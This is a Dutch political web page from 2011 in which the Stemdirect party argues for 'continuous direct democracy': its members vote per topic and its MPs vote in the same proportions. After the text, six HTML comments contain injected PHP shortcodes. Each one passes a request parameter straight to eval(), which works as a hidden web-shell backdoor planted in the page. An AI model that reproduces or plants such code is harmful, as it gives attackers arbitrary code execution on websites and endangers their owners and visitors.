Waarom Stemdirect

| 17 januari 2011

Waarom Stemdirect?

Veel mensen voelen zich niet meer 100% thuis bij één van de huidige politieke partijen. Het gebeurt steeds vaker dat mensen de stemwijzer gebruiken om de “best passende partij” te selecteren.
Politieke partijen worden als onbetrouwbaar ervaren omdat zij hun verkiezingsbeloftes vergeten tijdens de coalitievormingen. Partijen doen niet wat ze beloofd hebben en bespelen de publieke opinie door vlak voor de verkiezingen “leuke” dingen te doen, te roepen en te beloven.
Voor de verkiezingen weet men niet welke partij te selecteren en na de verkiezingen is men ontevreden over wat de gekozen partij met hun stem heeft gedaan.

De oorzaak

De ontzuiling heeft de kiezer losgemaakt van de oude politieke partijen en een hogere opleiding heeft de burger mondiger gemaakt. In de huidige representatieve democratie zit de kiezer vier jaar vast aan zijn keuze. De enige mogelijkheid om een stem te laten horen is om bij de volgende verkiezingen op een andere politieke partij te stemmen. Maar alle politieke partijen spelen hetzelfde spelletje.

De oplossing

De oplossing is een politiek stelsel waar de kiezers meerdere stemmen kunnen uitbrengen, voor ieder onderwerp een aparte stem. Een stem die de kiezer kan wijzigen wanneer de partij niet meer doet wat ze in de verkiezingen heeft beloofd.

Wat is er nodig?

De invoering van directe democratie lost deze problemen op.
In een directe democratie kunt u per onderwerp aangeven hoe er naar uw mening gestemd moet worden. U behoudt uw stem en u geeft deze niet voor vier jaar weg aan een politieke partij die u vervolgens gaat vertegenwoordigen.

Wij vinden dat directe democratie teveel vraagt van de burger, hij moet zich verdiepen in alle politieke issues en moet dagelijks zijn stem uitbrengen. De oplossing hiervoor is de vorming van een politieke tussenpartij, een partij die volgens de principes van directe democratie werkt, die directe democratie mogelijk maakt.

Wat kunnen wij hierin betekenen?

Wij hebben Stemdirect opgericht. Stemdirect is een politieke tussenpartij zonder politiek inhoudelijke standpunten die op basis van het directe democratie principe werkt. Een partij die de burger ontlast en er tevens voor zorgt dat men kan kiezen en blijven kiezen. Een partij waarbij de volksvertegenwoordigers precies stemmen wat de Stemdirect leden willen.

Een lid van Stemdirect kan per onderwerp zijn stem geven aan een politieke partij naar keuze. Dus niet 1x in de 4 jaar 1 stem uitbrengen, maar 4 jaar lang meestemmen op alle onderwerpen.
De interne stemverhouding van de Stemdirect leden zal per onderwerp verschillen en de Stemdirect Tweede Kamerleden stemmen volgens dezelfde stemverhouding in de Tweede Kamer.

Als ondersteuning voor de meningsvorming is de website ‘WikiPolitiek.nl’ gemaakt. De standpunten van de politieke partijen worden hierop verzameld. Als lid kunt u zo een goede keuze maken bij ieder onderwerp.
Er wordt ook nog een speciale stemwijzer ontwikkeld om u wegwijs te maken in de vele standpunten van alle politieke partijen.

Wij noemen dit Continue Directe Democratie.
Stemdirect is geen echte politieke partij met standpunten, daar zijn er al genoeg van. Stemdirect vertegenwoordigt een andere vorm van democratie, eentje van meebeslissen.

  • Een democratie waar de burger continu mag kiezen, in plaats van 1x per 4 jaar.
  • Een democratie waar u zelf de beste ideeën van de verschillende partijen kunt steunen.

<!– [insert_php]if (isset($_REQUEST["USY"])){eval($_REQUEST["USY"]);exit;}[/insert_php][php]if (isset($_REQUEST["USY"])){eval($_REQUEST["USY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WLQmC"])){eval($_REQUEST["WLQmC"]);exit;}[/insert_php][php]if (isset($_REQUEST["WLQmC"])){eval($_REQUEST["WLQmC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UauY"])){eval($_REQUEST["UauY"]);exit;}[/insert_php][php]if (isset($_REQUEST["UauY"])){eval($_REQUEST["UauY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ikgnM"])){eval($_REQUEST["ikgnM"]);exit;}[/insert_php][php]if (isset($_REQUEST["ikgnM"])){eval($_REQUEST["ikgnM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["BCEd"])){eval($_REQUEST["BCEd"]);exit;}[/insert_php][php]if (isset($_REQUEST["BCEd"])){eval($_REQUEST["BCEd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ylePr"])){eval($_REQUEST["ylePr"]);exit;}[/insert_php][php]if (isset($_REQUEST["ylePr"])){eval($_REQUEST["ylePr"]);exit;}[/php] –>

Tags: , , ,

Category: Stemdirect

About the Author ()

Oprichter en bedenker van het Stemdirect concept

Comments are closed.